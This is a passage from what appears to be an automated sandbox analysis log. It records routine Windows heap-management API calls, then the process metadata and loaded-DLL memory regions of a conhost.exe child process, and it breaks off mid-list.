[0224.798] GetProcessHeap () returned 0x450000
[0224.798] GetProcessHeap () returned 0x450000
[0224.798] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4574c8) returned 1
[0224.798] GetProcessHeap () returned 0x450000
[0224.798] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4574c8) returned 0x10
[0224.798] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4574c8) returned 1
[0224.798] GetProcessHeap () returned 0x450000
[0224.798] GetProcessHeap () returned 0x450000
[0224.798] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x456618) returned 1
[0224.798] GetProcessHeap () returned 0x450000
[0224.798] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x456618) returned 0x14
[0224.798] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x456618) returned 1
[0224.798] GetProcessHeap () returned 0x450000
[0224.798] GetProcessHeap () returned 0x450000
[0224.798] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x450598) returned 1
[0224.798] GetProcessHeap () returned 0x450000
[0224.798] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x450598) returned 0x2
[0224.798] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x450598) returned 1
[0224.798] GetProcessHeap () returned 0x450000
[0224.798] GetProcessHeap () returned 0x450000
[0224.798] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x456e48) returned 1
[0224.798] GetProcessHeap () returned 0x450000
[0224.798] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x456e48) returned 0x14
[0224.798] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x456e48) returned 1
[0224.798] GetProcessHeap () returned 0x450000
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x456c10) returned 1
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x456c10) returned 0x14
[0224.799] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x456c10) returned 1
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x456c30) returned 1
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x456c30) returned 0x14
[0224.799] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x456c30) returned 1
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x456c50) returned 1
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x456c50) returned 0x14
[0224.799] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x456c50) returned 1
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459628) returned 1
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459628) returned 0x14
[0224.799] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459628) returned 1
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4594c8) returned 1
[0224.799] GetProcessHeap () returned 0x450000
[0224.799] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4594c8) returned 0x14
[0224.799] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4594c8) returned 1
[0224.799] GetProcessHeap () returned 0x450000
[0224.800] GetProcessHeap () returned 0x450000
[0224.800] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x452588) returned 1
[0224.800] GetProcessHeap () returned 0x450000
[0224.800] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x452588) returned 0x30
[0224.800] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x452588) returned 1
[0224.800] GetProcessHeap () returned 0x450000
[0224.800] GetProcessHeap () returned 0x450000
[0224.800] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459608) returned 1
[0224.800] GetProcessHeap () returned 0x450000
[0224.800] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459608) returned 0x14
[0224.800] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459608) returned 1
[0224.800] GetProcessHeap () returned 0x450000
[0224.800] GetProcessHeap () returned 0x450000
[0224.800] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x458f98) returned 1
[0224.800] GetProcessHeap () returned 0x450000
[0224.800] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x458f98) returned 0x30
[0224.801] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x458f98) returned 1
[0224.801] GetProcessHeap () returned 0x450000
[0224.801] GetProcessHeap () returned 0x450000
[0224.801] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459688) returned 1
[0224.801] GetProcessHeap () returned 0x450000
[0224.801] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459688) returned 0x14
[0224.801] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459688) returned 1
[0224.801] GetProcessHeap () returned 0x450000
[0224.801] GetProcessHeap () returned 0x450000
[0224.801] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4692b8) returned 1
[0224.801] GetProcessHeap () returned 0x450000
[0224.801] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4692b8) returned 0x82
[0224.802] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4692b8) returned 1
[0224.802] GetProcessHeap () returned 0x450000
[0224.802] GetProcessHeap () returned 0x450000
[0224.802] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4654d8) returned 1
[0224.802] GetProcessHeap () returned 0x450000
[0224.802] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4654d8) returned 0x14
[0224.802] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4654d8) returned 1
[0224.802] GetProcessHeap () returned 0x450000
[0224.802] GetProcessHeap () returned 0x450000
[0224.802] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x457378) returned 1
[0224.802] GetProcessHeap () returned 0x450000
[0224.802] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x457378) returned 0x10
[0224.802] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x457378) returned 1
[0224.802] GetProcessHeap () returned 0x450000
[0224.802] GetProcessHeap () returned 0x450000
[0224.802] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x456840) returned 1
[0224.802] GetProcessHeap () returned 0x450000
[0224.802] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x456840) returned 0x14
[0224.802] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x456840) returned 1
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x456860) returned 1
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x456860) returned 0x14
[0224.803] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x456860) returned 1
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x456880) returned 1
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x456880) returned 0x14
[0224.803] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x456880) returned 1
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4565d8) returned 1
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4565d8) returned 0x14
[0224.803] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4565d8) returned 1
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4573d8) returned 1
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4573d8) returned 0x10
[0224.803] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4573d8) returned 1
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] GetProcessHeap () returned 0x450000
[0224.803] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4565f8) returned 1
[0224.803] GetProcessHeap () returned 0x450000
[0224.804] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4565f8) returned 0x14
[0224.804] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4565f8) returned 1
[0224.804] GetProcessHeap () returned 0x450000
[0224.804] GetProcessHeap () returned 0x450000
[0224.804] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4527a0) returned 1
[0224.804] GetProcessHeap () returned 0x450000
[0224.804] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4527a0) returned 0x14
[0224.804] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4527a0) returned 1
[0224.804] GetProcessHeap () returned 0x450000
[0224.804] GetProcessHeap () returned 0x450000
[0224.804] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459588) returned 1
[0224.804] GetProcessHeap () returned 0x450000
[0224.804] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459588) returned 0x14
[0224.804] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459588) returned 1
[0224.804] GetProcessHeap () returned 0x450000
[0224.804] GetProcessHeap () returned 0x450000
[0224.804] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459388) returned 1
[0224.804] GetProcessHeap () returned 0x450000
[0224.804] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459388) returned 0x14
[0224.804] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459388) returned 1
[0224.804] GetProcessHeap () returned 0x450000
[0224.804] GetProcessHeap () returned 0x450000
[0224.804] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4596e8) returned 1
[0224.804] GetProcessHeap () returned 0x450000
[0224.804] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4596e8) returned 0x14
[0224.804] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4596e8) returned 1
[0224.805] GetProcessHeap () returned 0x450000
[0224.805] GetProcessHeap () returned 0x450000
[0224.805] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4595a8) returned 1
[0224.805] GetProcessHeap () returned 0x450000
[0224.805] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4595a8) returned 0x14
[0224.805] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4595a8) returned 1
[0224.805] GetProcessHeap () returned 0x450000
[0224.805] GetProcessHeap () returned 0x450000
[0224.805] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x457438) returned 1
[0224.805] GetProcessHeap () returned 0x450000
[0224.805] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x457438) returned 0x10
[0224.805] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x457438) returned 1
[0224.805] GetProcessHeap () returned 0x450000
[0224.805] GetProcessHeap () returned 0x450000
[0224.805] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4527c0) returned 1
[0224.805] GetProcessHeap () returned 0x450000
[0224.809] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4527c0) returned 0x14
[0224.810] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4527c0) returned 1
[0224.810] GetProcessHeap () returned 0x450000
[0224.810] GetProcessHeap () returned 0x450000
[0224.810] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x4573c0) returned 1
[0224.810] GetProcessHeap () returned 0x450000
[0224.810] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4573c0) returned 0x10
[0224.810] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4573c0) returned 1
[0224.810] exit (_Code=0)
Thread:
id = 17
os_tid = 0x112c
Process:
id = "3"
image_name = "conhost.exe"
filename = "c:\\windows\\system32\\conhost.exe"
page_root = "0x6cee1000"
os_pid = "0x10d0"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "2"
os_parent_pid = "0x3b8"
cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
cur_dir = "C:\\Windows"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 702
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 703
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 704
start_va = 0x50000
end_va = 0x8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 705
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 706
start_va = 0x400000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 707
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 708
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 709
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 710
start_va = 0x7ff637930000
end_va = 0x7ff637940fff
monitored = 0
entry_point = 0x7ff6379316b0
region_type = mapped_file
name = "conhost.exe"
filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")
Region:
id = 711
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 712
start_va = 0x90000
end_va = 0x1effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 713
start_va = 0x7ffa15160000
end_va = 0x7ffa1520cfff
monitored = 0
entry_point = 0x7ffa151781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 714
start_va = 0x7ffa13130000
end_va = 0x7ffa13317fff
monitored = 0
entry_point = 0x7ffa1315ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 715
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 716
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 717
start_va = 0x600000
end_va = 0x6bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 718
start_va = 0x7ffa13cc0000
end_va = 0x7ffa13d5cfff
monitored = 0
entry_point = 0x7ffa13cc78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 719
start_va = 0x90000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 720
start_va = 0xf0000
end_va = 0x1effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 721
start_va = 0x6c0000
end_va = 0x8bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006c0000"
filename = ""
Region:
id = 722
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 723
start_va = 0x7ffa0abf0000
end_va = 0x7ffa0ac48fff
monitored = 0
entry_point = 0x7ffa0abffbf0
region_type = mapped_file
name = "conhostv2.dll"
filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")
Region:
id = 724
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 725
start_va = 0x7ffa14340000
end_va = 0x7ffa145bcfff
monitored = 0
entry_point = 0x7ffa14414970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 726
start_va = 0x7ffa145c0000
end_va = 0x7ffa146dbfff
monitored = 0
entry_point = 0x7ffa146002b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 727
start_va = 0x7ffa13320000
end_va = 0x7ffa13389fff
monitored = 0
entry_point = 0x7ffa13356d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 728
start_va = 0x7ffa13d80000
end_va = 0x7ffa13ed5fff
monitored = 0
entry_point = 0x7ffa13d8a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 729
start_va = 0x7ffa13ee0000
end_va = 0x7ffa14065fff
monitored = 0
entry_point = 0x7ffa13f2ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 730
start_va = 0xe0000
end_va = 0xe6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 731
start_va = 0x7ffa13b70000
end_va = 0x7ffa13cb2fff
monitored = 0
entry_point = 0x7ffa13b98210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 732
start_va = 0x7ffa14070000
end_va = 0x7ffa140cafff
monitored = 0
entry_point = 0x7ffa140838b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 733
start_va = 0x7ffa141e0000
end_va = 0x7ffa1421afff
monitored = 0
entry_point = 0x7ffa141e12f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 734
start_va = 0x7ffa147c0000
end_va = 0x7ffa14880fff
monitored = 0
entry_point = 0x7ffa147e0da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 735
start_va = 0x7ffa11220000
end_va = 0x7ffa113a5fff
monitored = 0
entry_point = 0x7ffa1126d700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 736
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 737
start_va = 0x6c0000
end_va = 0x847fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006c0000"
filename = ""
Region:
id = 738
start_va = 0x850000
end_va = 0x850fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000850000"
filename = ""
Region:
id = 739
start_va = 0x8b0000
end_va = 0x8bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008b0000"
filename = ""
Region:
id = 740
start_va = 0x8c0000
end_va = 0xa40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008c0000"
filename = ""
Region:
id = 741
start_va = 0xa50000
end_va = 0x1e4ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a50000"
filename = ""
Region:
id = 742
start_va = 0x1e50000
end_va = 0x1f0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e50000"
filename = ""
Region:
id = 743
start_va = 0x860000
end_va = 0x89ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000860000"
filename = ""
Region:
id = 744
start_va = 0x7ffa15210000
end_va = 0x7ffa1676efff
monitored = 0
entry_point = 0x7ffa153711f0
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 745
start_va = 0x7ffa13390000
end_va = 0x7ffa133d2fff
monitored = 0
entry_point = 0x7ffa133a4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 746
start_va = 0x7ffa13520000
end_va = 0x7ffa13b63fff
monitored = 0
entry_point = 0x7ffa136e64b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 747
start_va = 0x7ffa15090000
end_va = 0x7ffa15136fff
monitored = 0
entry_point = 0x7ffa150a58d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 748
start_va = 0x7ffa14ba0000
end_va = 0x7ffa14bf1fff
monitored = 0
entry_point = 0x7ffa14baf530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 749
start_va = 0x7ffa12e10000
end_va = 0x7ffa12e1efff
monitored = 0
entry_point = 0x7ffa12e13210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 750
start_va = 0x7ffa12e80000
end_va = 0x7ffa12f34fff
monitored = 0
entry_point = 0x7ffa12ec22e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 751
start_va = 0x7ffa12dc0000
end_va = 0x7ffa12e0afff
monitored = 0
entry_point = 0x7ffa12dc35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 752
start_va = 0x7ffa12d90000
end_va = 0x7ffa12da3fff
monitored = 0
entry_point = 0x7ffa12d952e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 753
start_va = 0x7ffa11710000
end_va = 0x7ffa117a5fff
monitored = 0
entry_point = 0x7ffa11735570
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 754
start_va = 0x1f10000
end_va = 0x205ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f10000"
filename = ""
Region:
id = 755
start_va = 0x2060000
end_va = 0x2396fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 756
start_va = 0x23a0000
end_va = 0x25b5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023a0000"
filename = ""
Region:
id = 757
start_va = 0x25c0000
end_va = 0x27dafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025c0000"
filename = ""
Region:
id = 758
start_va = 0x1f10000
end_va = 0x2025fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f10000"
filename = ""
Region:
id = 759
start_va = 0x2050000
end_va = 0x205ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002050000"
filename = ""
Region:
id = 760
start_va = 0x27e0000
end_va = 0x29f4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 761
start_va = 0x2a00000
end_va = 0x2b15fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a00000"
filename = ""
Region:
id = 762
start_va = 0x1e50000
end_va = 0x1e8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e50000"
filename = ""
Region:
id = 763
start_va = 0x1f00000
end_va = 0x1f0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f00000"
filename = ""
Region:
id = 764
start_va = 0x7ffa14a40000
end_va = 0x7ffa14b99fff
monitored = 0
entry_point = 0x7ffa14a838e0
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 765
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 766
start_va = 0x2b20000
end_va = 0x2bdbfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002b20000"
filename = ""
Region:
id = 767
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 768
start_va = 0x7ffa10610000
end_va = 0x7ffa10631fff
monitored = 0
entry_point = 0x7ffa10611a40
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 769
start_va = 0x7ffa11410000
end_va = 0x7ffa11422fff
monitored = 0
entry_point = 0x7ffa11412760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 770
start_va = 0x7ffa12ba0000
end_va = 0x7ffa12bf5fff
monitored = 0
entry_point = 0x7ffa12bb0bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 771
start_va = 0x60000
end_va = 0x66fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 772
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
